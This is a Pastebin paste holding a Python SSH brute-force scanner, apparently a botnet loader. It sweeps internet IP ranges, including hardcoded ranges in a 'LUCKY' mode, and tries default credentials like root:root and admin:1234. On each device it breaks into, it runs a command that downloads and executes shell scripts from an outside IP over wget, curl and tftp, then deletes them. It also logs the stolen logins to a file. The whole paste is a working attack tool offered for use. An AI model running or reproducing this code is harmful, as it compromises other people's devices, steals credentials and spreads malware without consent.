API tools faq
paste
Advertisement
Boohdoz

Untitled

Boohdoz
Apr 29th, 2017
412
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.39 KB | None | 0 0
raw download clone embed print report
  1. # Voids hacka scanna
  2.  
  3. # nano /usr/include/bits/typesizes.h -> change 1024 to 99999
  4.  
  5. # ulimit -n 99999
  6.  
  7. # python scan.py 1000 <start-range> <end-range>
  8.  
  9.  
  10.  
  11. import threading, paramiko, random, socket, time, sys
  12.  
  13.  
  14.  
  15. paramiko.util.log_to_file("/dev/null")
  16.  
  17.  
  18.  
  19. blacklisted = ["127.0","10.0","192.168"]
  20.  
  21.  
  22.  
  23. passwords = ["admin:1234"]
  24.  
  25.  
  26.  
  27. server_ip = "50.115.166.180"
  28.  
  29.  
  30.  
  31. found = 0
  32.  
  33. hosts = 0
  34.  
  35. othreads = 0
  36.  
  37.  
  38.  
  39. if len(sys.argv) < 4:
  40.  
  41. sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
  42.  
  43.  
  44.  
  45. if sys.argv[4] == "root":
  46.  
  47. passwords = ["root:root"]
  48.  
  49. if sys.argv[4] == "guest":
  50.  
  51. passwords = ["guest:guest"]
  52.  
  53. if sys.argv[4] == "telnet":
  54.  
  55. passwords = ["telnet:telnet"]
  56.  
  57.  
  58.  
  59. print """\nStarting Scan."""
  60.  
  61.  
  62.  
  63. def sshscanner(ip):
  64.  
  65. global found
  66.  
  67. global hosts
  68.  
  69. global othreads
  70.  
  71. global passwords
  72.  
  73. try:
  74.  
  75. thisipisbad='no'
  76.  
  77. for badip in blacklisted:
  78.  
  79. if badip in ip:
  80.  
  81. thisipisbad='yes'
  82.  
  83. if thisipisbad=='yes':
  84.  
  85. sys.exit()
  86.  
  87. username='root'
  88.  
  89. password="0"
  90.  
  91. port = 22
  92.  
  93. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  94.  
  95. s.settimeout(3)
  96.  
  97. s.connect((ip, port))
  98.  
  99. s.close()
  100.  
  101. hosts += 1
  102.  
  103. ssh = paramiko.SSHClient()
  104.  
  105. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  106.  
  107. dobreak=False
  108.  
  109. for passwd in passwords:
  110.  
  111. if ":n/a" in passwd:
  112.  
  113. password=""
  114.  
  115. else:
  116.  
  117. password=passwd.split(":")[1]
  118.  
  119. if "n/a:" in passwd:
  120.  
  121. username=""
  122.  
  123. else:
  124.  
  125. username=passwd.split(":")[0]
  126.  
  127. try:
  128.  
  129. ssh.connect(ip, port = port, username=username, password=password, timeout=3)
  130.  
  131. break
  132.  
  133. except:
  134.  
  135. pass
  136.  
  137. badserver=True
  138.  
  139. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  140.  
  141. output = stdout.read()
  142.  
  143. if "inet addr" in output:
  144.  
  145. badserver=False
  146.  
  147. if badserver == False:
  148.  
  149. ssh.exec_command("cd /tmp; wget http://173.212.197.181/gtop.sh || curl -O http://173.212.197.181/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 173.212.197.181 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 173.212.197.181; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh")
  150.  
  151. vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
  152.  
  153. found += 1
  154.  
  155. time.sleep(12)
  156.  
  157. ssh.close()
  158.  
  159. othreads = othreads - 1
  160.  
  161. except Exception as e:
  162.  
  163. othreads = othreads - 1
  164.  
  165.  
  166.  
  167.  
  168.  
  169. if sys.argv[2] == "LUCKY":
  170.  
  171. ranges = ["122.3.0.0/122.3.255.255|admin:1234", "122.52.0.0/122.54.255.255|admin:1234", "124.83.0.0/124.83.255.255|admin:1234", "124.105.0.0/124.107.255.255|admin:1234", "14.162.0.0/14.162.255.255|telnet:telnet", "14.177.0.0/14.177.255.255|telnet:telnet", "49.228.0.0/49.228.255.255|guest:guest", "101.109.0.0/101.109.255.255|root:root", "125.25.0.0/125.27.255.255|root:root", "5.78.0.0/5.78.255.255|root:root"]
  172.  
  173. randomrange = random.choice(ranges)
  174.  
  175. startrng = randomrange.split("/")[0]
  176.  
  177. endrng = randomrange.split("/")[1].split("|")[0]
  178.  
  179. passwords = []
  180.  
  181. passwords.append(randomrange.split("|")[1])
  182.  
  183.  
  184.  
  185. if sys.argv[2] != "LUCKY":
  186.  
  187. a = int(sys.argv[2].split(".")[0])
  188.  
  189. b = int(sys.argv[2].split(".")[1])
  190.  
  191. c = int(sys.argv[2].split(".")[2])
  192.  
  193. d = int(sys.argv[2].split(".")[3])
  194.  
  195. else:
  196.  
  197. a = int(startrng.split(".")[0])
  198.  
  199. b = int(startrng.split(".")[1])
  200.  
  201. c = int(startrng.split(".")[2])
  202.  
  203. d = int(startrng.split(".")[3])
  204.  
  205. x = 0
  206.  
  207.  
  208.  
  209. print("Found Threads Scanned Current")
  210.  
  211. sys.stdout.write('\r|0 |0 |0 |' + str(a)+'.'+str(b)+'.'+str(c)+'.*')
  212.  
  213.  
  214.  
  215. while(True):
  216.  
  217. try:
  218.  
  219.  
  220.  
  221. if sys.argv[2] != "LUCKY":
  222.  
  223. endaddr = sys.argv[3]
  224.  
  225. else:
  226.  
  227. endaddr = endrng
  228.  
  229.  
  230.  
  231. d += 1
  232.  
  233.  
  234.  
  235. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
  236.  
  237.  
  238.  
  239. if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
  240.  
  241. if sys.argv[2] == "LUCKY":
  242.  
  243. randomrange = random.choice(ranges)
  244.  
  245. startrng = randomrange.split("/")[0]
  246.  
  247. endrng = randomrange.split("/")[1].split("|")[0]
  248.  
  249. passwords = []
  250.  
  251. passwords.append(randomrange.split("|")[1])
  252.  
  253. a = int(startrng.split(".")[0])
  254.  
  255. b = int(startrng.split(".")[1])
  256.  
  257. c = int(startrng.split(".")[2])
  258.  
  259. d = int(startrng.split(".")[3])
  260.  
  261. else:
  262.  
  263. break
  264.  
  265.  
  266.  
  267. if d > 255:
  268.  
  269. c += 1
  270.  
  271. d = 0
  272.  
  273.  
  274.  
  275. if c > 255:
  276.  
  277. b += 1
  278.  
  279. c = 0
  280.  
  281.  
  282.  
  283. if b > 255:
  284.  
  285. a += 1
  286.  
  287. b = 0
  288.  
  289.  
  290.  
  291. ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
  292.  
  293.  
  294.  
  295. if ipaddr == endaddr:
  296.  
  297. if sys.argv[2] == "LUCKY":
  298.  
  299. randomrange = random.choice(ranges)
  300.  
  301. startrng = randomrange.split("/")[0]
  302.  
  303. endrng = randomrange.split("/")[1].split("|")[0]
  304.  
  305. passwords = []
  306.  
  307. passwords.append(randomrange.split("|")[1])
  308.  
  309. a = int(startrng.split(".")[0])
  310.  
  311. b = int(startrng.split(".")[1])
  312.  
  313. c = int(startrng.split(".")[2])
  314.  
  315. d = int(startrng.split(".")[3])
  316.  
  317. else:
  318.  
  319. break
  320.  
  321.  
  322.  
  323. if x > 500:
  324.  
  325. time.sleep(1)
  326.  
  327. x = 0
  328.  
  329.  
  330.  
  331. othreads += 1
  332.  
  333.  
  334.  
  335. while(othreads >= int(sys.argv[1])):
  336.  
  337. time.sleep(1)
  338.  
  339.  
  340.  
  341. sys.stdout.write('\r\x1b[0m|\x1b[0;32m'+str(found)+' \x1b[0m|\x1b[0;33m' + str(othreads) + ' \x1b[0m|\x1b[0;31m'+str(hosts)+' \x1b[0m|\x1b[1;34m' + str(a)+'.'+str(b)+'.'+str(c)+'.*\x1b[0m')
  342.  
  343. sys.stdout.flush()
  344.  
  345.  
  346.  
  347. t = threading.Thread(target=sshscanner, args=(ipaddr,))
  348.  
  349. t.start()
  350.  
  351.  
  352.  
  353. except Exception as e:
  354.  
  355. pass
  356.  
  357.  
  358.  
  359. print "\x1b[37mDone\x1b[37m"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!